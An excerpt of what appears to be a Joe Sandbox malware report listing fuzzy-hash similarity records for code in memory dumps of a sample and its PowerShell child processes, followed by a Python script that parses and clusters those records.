                                                  • Instruction ID: 5589b119e9ddcd77e4accbf4a5875172a551c6fbd87a5769779c3047402ae2a4
                                                  • Opcode Fuzzy Hash: 297a1d0dbdc33461d8ddddedb07ab7cff3c12a09df1b5bcc48d585a818a87464
                                                  • Instruction Fuzzy Hash: 27C08013E59F0A17EFB44344F4D55A923C1EB54790F454071B469C017BEC5955874641
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 79351476f9d10844cc6c72d9fd8c927288291fbc68c7e0eb4a72b0c2ad920a1b
                                                  • Instruction ID: 3f72391664d058a6f8d52d6f7cdffcac23b725fdb0871d5536f3b166689534bf
                                                  • Opcode Fuzzy Hash: 79351476f9d10844cc6c72d9fd8c927288291fbc68c7e0eb4a72b0c2ad920a1b
                                                  • Instruction Fuzzy Hash: 84C0C00660CC4D03D710279870511F26390FB75300F040072E0B843049CC346D434381
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ce9943a79baf079cc0b85738bc621bd9cc8c335891b0ff67989af174ddb2cc5d
                                                  • Instruction ID: 2c05c05c6edfe3ed9d6db9a203cf31b8e6f3f8d5bbe8bcbae3e6720d21b42796
                                                  • Opcode Fuzzy Hash: ce9943a79baf079cc0b85738bc621bd9cc8c335891b0ff67989af174ddb2cc5d
                                                  • Instruction Fuzzy Hash: 6DC09221B1AC2C1B86B8F26D1859A7A14DACBDD62171A42ABA41CD32A9DC644C0643D1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 16d46efa90a39c2432c30bc3c9c86fcd0e210bae34311933075770b3018d9c79
                                                  • Instruction ID: 481a79f1be51333a184b3061a1fce78b298c334e956ca1b91329b970b9d7613c
                                                  • Opcode Fuzzy Hash: 16d46efa90a39c2432c30bc3c9c86fcd0e210bae34311933075770b3018d9c79
                                                  • Instruction Fuzzy Hash: DCB09227B4BA0EC6EA2062C474120FDB3A0EB89676F124273D22E814514A2A3A658182
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 71d287cf2a69af2f615b93d9a5baa796d5cb81f382d0b65fd70d02e3aaec6be8
                                                  • Instruction ID: a931c07a24a00f07d3e2683199b03112cbfbdfa8d2bd1a0e0b173e76da7a10f2
                                                  • Opcode Fuzzy Hash: 71d287cf2a69af2f615b93d9a5baa796d5cb81f382d0b65fd70d02e3aaec6be8
                                                  • Instruction Fuzzy Hash: 6BB0922BB4B80E86EA3122C574220FDB314EB886B6F520233E22D81051892722654181
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e55a75ff9e19932f76e50e3618ba7705c9440b530d8c687fcbbdf5c1af5ca719
                                                  • Instruction ID: ca8287f7cb49f7676a4994de72273b2222363ce12cd9758fe41cf8d07fc90052
                                                  • Opcode Fuzzy Hash: e55a75ff9e19932f76e50e3618ba7705c9440b530d8c687fcbbdf5c1af5ca719
                                                  • Opcode Fuzzy Hash: ab6f4be41127e5de64835a39a07bfe7757212f5f904305e31970f2092553ec02
                                                  • Instruction Fuzzy Hash: 2621E2B7B084258E930B7A7DB9195E43790DF9423A74805FBD1EE8F283AC15308786C4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: O_^$O_^$O_^$O_^
                                                  • API String ID: 0-2676438797
                                                  • Opcode ID: 2f41d7d23d97139b512322137dc1baa2ede98c0e740b24da9f65e55b796fe585
                                                  • Instruction ID: 267187603c8d3ebf9110ec1405d8293df74e2bbd6c934ac95a74236b6b009286
                                                  • Opcode Fuzzy Hash: 2f41d7d23d97139b512322137dc1baa2ede98c0e740b24da9f65e55b796fe585
                                                  • Instruction Fuzzy Hash: 30215767F0B6D98AD7265B2EACB60E43780FF616AD70902B3C5AE0F153BD14254B4241
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: P_^0$P_^2$P_^4$P_^6
                                                  • API String ID: 0-2515599365
                                                  • Opcode ID: c20f82e8c72d0a8dd7583b526fdf7d054e9064c9369fe6fcb49f3ab8a7369df8
                                                  • Instruction ID: 9f11bc910ddde97c0958251672498a67c8bdd5cde97f9e0b60092faed4a8c681
                                                  • Opcode Fuzzy Hash: c20f82e8c72d0a8dd7583b526fdf7d054e9064c9369fe6fcb49f3ab8a7369df8
                                                  • Instruction Fuzzy Hash: 95F0C2E6909058CAD7056BA86CE43E8379CEF0035C7A80536C0ED8705BE8553987A659
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: P_^0$P_^2$P_^4$P_^6
                                                  • API String ID: 0-2515599365
                                                  • Opcode ID: 9834c90dd016d5611c4058c0f388fc4139b587057148e2d5a1ce5796a91cad08
                                                  • Instruction ID: 7042d83672a712628df446df05b47b1f343430596faf0fd7f7c6ae98344027e0
                                                  • Opcode Fuzzy Hash: 9834c90dd016d5611c4058c0f388fc4139b587057148e2d5a1ce5796a91cad08
                                                  • Instruction Fuzzy Hash: D89002425180A240930A656435654E45B118A0613A60845E2D0D909087784520865144
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1770035713.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b960000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b308a2940b2553fcf1a3bcedd6587ecc0cacf37ebbfc5475ef57a98a5d5339a4
                                                  • Instruction ID: 7a8f8667824944bca34d446e83104cb553b8885c4c99c66ec79f6777ac84d142
                                                  • Opcode Fuzzy Hash: b308a2940b2553fcf1a3bcedd6587ecc0cacf37ebbfc5475ef57a98a5d5339a4
                                                  • Instruction Fuzzy Hash: 2CD14632A1FB8E9FEBA5DBA848754B57BA0EF16310B0901FED05CC70E3DA18A905C341
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1769517514.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c29724c57bec023804233a925b52cb9cb5435acaed605a11f3f0a131d0043619
                                                  • Instruction ID: af453549ef9ced8971997a148959a1156d3aff7a9da06f83ee0bd490dcfdb620
                                                  • Opcode Fuzzy Hash: c29724c57bec023804233a925b52cb9cb5435acaed605a11f3f0a131d0043619
                                                  • Instruction Fuzzy Hash: E1116D69A0FBCD5FDB538B284C280947FB0EF2721070A02E7D485CB0B3D9295D08C792
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1769517514.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b2855f061a4af9dbced812f5da62ed086f47570febd1b02bba84e60a9c116035
                                                  • Instruction ID: 77e5a924ac7bf0415d2e187adf6359ad51c2c58faeccfaad3aaf2137db03ecf3
                                                  • Opcode Fuzzy Hash: b2855f061a4af9dbced812f5da62ed086f47570febd1b02bba84e60a9c116035
                                                  • Instruction Fuzzy Hash: 22415A71A0DB889FDB189F5C9C1A6B87BE0FF59310F50416FE458C3292DB20A945CBC2
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1769083071.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b77d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0f91135cd34842f9794110ad472ab7e8d38106b466ad2e7a46551b2c5818be79
                                                  • Instruction ID: 470ad809314a38628f54bae49b97647dbfc7319dbec8322b8f8531ca9c37ec4d
                                                  • Opcode Fuzzy Hash: 0f91135cd34842f9794110ad472ab7e8d38106b466ad2e7a46551b2c5818be79
                                                  • Instruction Fuzzy Hash: 8D41287150EBC84FE7568B2898959523FF0EF52324B1606EFD088CB1B3D625B846C792
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1769517514.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 268c180421140ac31621d8d538a752520c8cde243dcff9b6c0caca383187d890
                                                  • Instruction ID: eb7ea4035f4d3c6ccd3f87fdd779f72889c474952542e29e4713bd372978c180
                                                  • Opcode Fuzzy Hash: 268c180421140ac31621d8d538a752520c8cde243dcff9b6c0caca383187d890
                                                  • Instruction Fuzzy Hash: 5721F83190CB4C8FEB59DBAC9C4A7E97FE0EB96321F04416FD049C3162DA749456CB92
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1769517514.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                  • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                  • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1770035713.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b960000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a214e6186cc1042f39e41104f94fe97f31ee36c0095aeec427d2385f308bd464
                                                  • Instruction ID: 4227e4a91347d7e05b6ef6c1d5948bbe964f2afc9bc5b74d24e0f1abd8d8f098
                                                  • Opcode Fuzzy Hash: a214e6186cc1042f39e41104f94fe97f31ee36c0095aeec427d2385f308bd464
                                                  • Instruction Fuzzy Hash: 6CF0BE32B0E5498FD768EB9CE4529E873E0EF6532071600BAE06DC72B3CA25EC41C741
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1770035713.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b960000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8a58d753f950c5fe4c53ed2450ab7512bdb78d82cf33a8f645c155cffd2c128b
                                                  • Instruction ID: bfe193b89df9994d704ca6913f58847bd944f5e5f10796a930887ea48faa20ba
                                                  • Opcode Fuzzy Hash: 8a58d753f950c5fe4c53ed2450ab7512bdb78d82cf33a8f645c155cffd2c128b
                                                  • Instruction Fuzzy Hash: 98F0BE32B0E5498FD765EB9CE0629E873E0EF0532074600BAE05DCB1B3CA26AC40C740
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1770035713.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b960000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                  • Instruction ID: c307260e9cdd7784a7691b08768f083a0fcbbbef75ed33e7c580895a31fc6b9b
                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                  • Instruction Fuzzy Hash: ADE01A31B1C808DFDA78DA8CE051AE973E1EBA832171241BBD14EC7671CA22ED518B80
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1769517514.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: M_^$M_^$M_^$M_^$M_^$M_^$^
                                                  • API String ID: 0-3431015851
                                                  • Opcode ID: 93731e364ea0a6a5f1cc8cf4c7056456136c1aafd6e49b0cf33b1ecd00e5a3a0
                                                  • Instruction ID: 20257abb91d999419d136fb70b0ddb0c2f494fc00c296e455723ba3664105cf9
                                                  • Opcode Fuzzy Hash: 93731e364ea0a6a5f1cc8cf4c7056456136c1aafd6e49b0cf33b1ecd00e5a3a0
                                                  • Instruction Fuzzy Hash: 9C71C253B0FADB1BE723477958790A47F90EF667A471B02F7C4D88B0A3EE04694B8251
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1769517514.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: M_^$M_^$M_^$M_^$M_^$^$^
                                                  • API String ID: 0-3984310336
                                                  • Opcode ID: 2e8734cdb6aaec917914e33b309a7f03731875215ee2f5c1793ddc8369e0023a
                                                  • Instruction ID: 13335b15ed0cff82e5e799a58fe31329e5d59bceaa4563e829c97307f0d9b8fa
                                                  • Opcode Fuzzy Hash: 2e8734cdb6aaec917914e33b309a7f03731875215ee2f5c1793ddc8369e0023a
                                                  • Instruction Fuzzy Hash: C161A153A0FADB5BE723477948790A47F90EF667A471A02F7C4D48A0A3FE04694B8251
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1795618329.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b970000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d3d793171ab02a31cafca529c67708ac3aabd580d8d570e690f84585f8f56c43
                                                  • Instruction ID: 6891b06f8b5d62aee1599491ab8e3ba1e9bcd555b73079eada6be9b1c6fc1774
                                                  • Opcode Fuzzy Hash: d3d793171ab02a31cafca529c67708ac3aabd580d8d570e690f84585f8f56c43
                                                  • Instruction Fuzzy Hash: A5D15622A3FA8E1FE7A5DBA848A55B57BE0EF56310F0901FFD05DC70E3DA18A9058351
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1795266671.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8a0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                  • Instruction ID: 66b3c44c33d79172e357d3888bd286874ef90d71cf170dd002321310a4f04bb7
                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                  • Instruction Fuzzy Hash: B301677121CB0C8FD748EF0CE451AA5B7E0FB99364F10056DE58AC36A5D636E882CB45
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1909229171.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7ffd9b980000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8fa09991b8c1a8c93c62b249a32db7685619f75d5fbe0d7eb0ca03a7b2e7c81e
                                                  • Instruction ID: f232a8e9c011018500972da165e653ad0ab0b0f472edd515c189e5ed44927da3
                                                  • Opcode Fuzzy Hash: 8fa09991b8c1a8c93c62b249a32db7685619f75d5fbe0d7eb0ca03a7b2e7c81e
                                                  • Instruction Fuzzy Hash: B9D15922A2FE8E1FE7A5DBB848655B57BE0EF56310B0901FED05DCB1E3D928A805C351
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1908623177.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7ffd9b8b0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5669af102cff79fe0b70ed9f051b58adc099fd5bf2cb6beff09c2eb34191be54
                                                  • Instruction ID: 9bdfda7ff094c016ee29611a0f36b44afefaafe4c9d5040173e090ca4ad0f1af
                                                  • Opcode Fuzzy Hash: 5669af102cff79fe0b70ed9f051b58adc099fd5bf2cb6beff09c2eb34191be54
                                                  • Instruction Fuzzy Hash: 8701A73120CB0C4FD748EF0CE451AA6B3E0FB89320F10056EE58AC36A1DA32E882CB41
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2060559323.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_7ffd9b950000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4236689e585acdce3295cf551922ff792e5a43d5f9d4415bf43cc354dffe91de
                                                  • Instruction ID: e56deb24ee9b86bd40d0713120367112c9c087f4e4313328ab5f1b76c5896f1d
                                                  • Opcode Fuzzy Hash: 4236689e585acdce3295cf551922ff792e5a43d5f9d4415bf43cc354dffe91de
                                                  • Instruction Fuzzy Hash: F7D15B21B2FACE1FE7A59BF888655B57BA0EF16310B0901FED49DCB0E3D958A805C351
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2059671531.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_7ffd9b880000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f560faad2d692fb251752d9380fa7a291690ad0b318bdce2c1380cc1bb99454b
                                                  • Instruction ID: 546544054f09e5cc93ed1144df8162569c89a7ff127d73241948bab4e7ac81c6
                                                  • Opcode Fuzzy Hash: f560faad2d692fb251752d9380fa7a291690ad0b318bdce2c1380cc1bb99454b
                                                  • Instruction Fuzzy Hash: 9911823250E7854FE7174B68A8624E07FB0EF1323474A01E7D4D5C74A3D52A5946C795
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2059671531.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_7ffd9b880000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 423667439589d9ebf630b30f5cfe2cbc8dd7d6bc1a9f9559f6bbbae34852fd24
                                                  • Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
                                                  • Opcode Fuzzy Hash: 423667439589d9ebf630b30f5cfe2cbc8dd7d6bc1a9f9559f6bbbae34852fd24
                                                  • Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2292042837.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_7ffd9b870000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                  • Instruction ID: 240e77624845bd21eb498471991253802ac2a52bcd73a2482a697d82a952278d
                                                  • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                  • Instruction Fuzzy Hash: 9201A73020CB0C4FD748EF0CE451AA6B3E0FB89324F10056DE58AC36A1DA32E882CB42
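The "Memory Dump Source" entries above are Joe Sandbox's per-function similarity records for code carved out of memory regions that are not backed by a PE image ("based on PE: false"), both in the sample itself (process index 0) and in the powershell.exe children it spawned (indexes 5, 8, 10, 15, 23). Below is an added example, not code from this page or from Joe Sandbox, that parses those records, cross-checks the hex process index in the dump file name against the decimal index in the snapshot name (0000000A and hcaresult_10 refer to the same process), and clusters functions across processes by their Instruction Fuzzy Hash. The input is a constructed subset copied from five of the entries above. Two things are assumptions rather than documented Joe Sandbox behaviour: the position-wise similarity metric (Joe Sandbox's own scoring is not described on this page) and the reading of the fifth dot-separated field of the dump name as a Windows page protection (0x40 being PAGE_EXECUTE_READWRITE).

```python
"""Parse Joe Sandbox 'Memory Dump Source' function records and cluster
near-identical functions across processes by Instruction Fuzzy Hash."""
import re
from collections import defaultdict

# Constructed sample: five records copied from the report above (one from
# zamPeEkHWr.exe, four from powershell.exe), trimmed to the fields parsed here.
SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
• Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
• Instruction Fuzzy Hash: D89002425180A240930A656435654E45B118A0613A60845E2D0D909087784520865144
Memory Dump Source
• Source File: 00000005.00000002.1769517514.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
• Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
• Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
Memory Dump Source
• Source File: 0000000A.00000002.1908623177.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
• Snapshot File: hcaresult_10_2_7ffd9b8b0000_powershell.jbxd
• Instruction Fuzzy Hash: 8701A73120CB0C4FD748EF0CE451AA6B3E0FB89320F10056EE58AC36A1DA32E882CB41
Memory Dump Source
• Source File: 0000000F.00000002.2059671531.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
• Snapshot File: hcaresult_15_2_7ffd9b880000_powershell.jbxd
• Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41
Memory Dump Source
• Source File: 00000017.00000002.2292042837.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
• Snapshot File: hcaresult_23_2_7ffd9b870000_powershell.jbxd
• Instruction Fuzzy Hash: 9201A73020CB0C4FD748EF0CE451AA6B3E0FB89324F10056DE58AC36A1DA32E882CB42
"""

SOURCE_RE = re.compile(r"Source File: (\S+?), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")
SNAPSHOT_RE = re.compile(r"Snapshot File: hcaresult_(\d+)_(\d+)_[0-9a-f]+_(.+)\.jbxd")
IFH_RE = re.compile(r"Instruction Fuzzy Hash: (\S+)")

PAGE_EXECUTE_READWRITE = 0x40  # Windows memory protection constant


def parse_entries(text):
    """One dict per 'Memory Dump Source' block; unknown lines are ignored."""
    entries, cur = [], None
    for line in text.splitlines():
        line = line.strip()
        if line == "Memory Dump Source":
            cur = {}
            entries.append(cur)
            continue
        if cur is None:
            continue
        if m := SOURCE_RE.search(line):
            # Dump name fields are dot separated: hex process index, dump index,
            # an id, the region base, then flags. Treating field 4 as the page
            # protection is an assumption (not confirmed by the report).
            f = m.group(1).split(".")
            cur["process_index"] = int(f[0], 16)
            cur["base"] = int(f[3], 16)
            cur["protect"] = int(f[4], 16)
            cur["offset"] = int(m.group(2), 16)
            cur["based_on_pe"] = m.group(3) == "true"
        elif m := SNAPSHOT_RE.search(line):
            cur["snapshot_process"] = int(m.group(1))
            cur["image"] = m.group(3)
        elif m := IFH_RE.search(line):
            cur["ifh"] = m.group(1)
    return entries


def check_entry(e):
    """Consistency checks: hex index in the dump name must equal the decimal
    index in the snapshot name, and Offset must equal the base field."""
    return e["process_index"] == e["snapshot_process"] and e["base"] == e["offset"]


def is_rwx_non_pe(e):
    """Flag functions living in RWX memory with no PE backing (JIT or injected code)."""
    return e["protect"] == PAGE_EXECUTE_READWRITE and not e["based_on_pe"]


def fuzzy_similarity(a, b):
    """Fraction of positions at which two equal-length hashes agree (assumed metric)."""
    if len(a) != len(b):
        return 0.0
    return sum(x == y for x, y in zip(a, b)) / len(a)


def cluster(entries, threshold=0.85):
    """Single-linkage clustering by Instruction Fuzzy Hash; returns sorted groups
    of (process_index, image) tuples."""
    parent = list(range(len(entries)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    for i in range(len(entries)):
        for j in range(i + 1, len(entries)):
            if fuzzy_similarity(entries[i]["ifh"], entries[j]["ifh"]) >= threshold:
                parent[find(i)] = find(j)
    groups = defaultdict(list)
    for i, e in enumerate(entries):
        groups[find(i)].append((e["process_index"], e["image"]))
    return sorted(sorted(g) for g in groups.values())


def summarize(text):
    entries = parse_entries(text)
    bad = [e for e in entries if not check_entry(e)]
    return entries, bad, cluster(entries)


if __name__ == "__main__":
    entries, bad, groups = summarize(SAMPLE)
    for e in entries:
        print(f"pid {e['process_index']:>2} {e['image']:<11} base {e['base']:#x} rwx_non_pe={is_rwx_non_pe(e)}")
    print("inconsistent records:", len(bad))
    for g in groups:
        print("cluster:", g)
```

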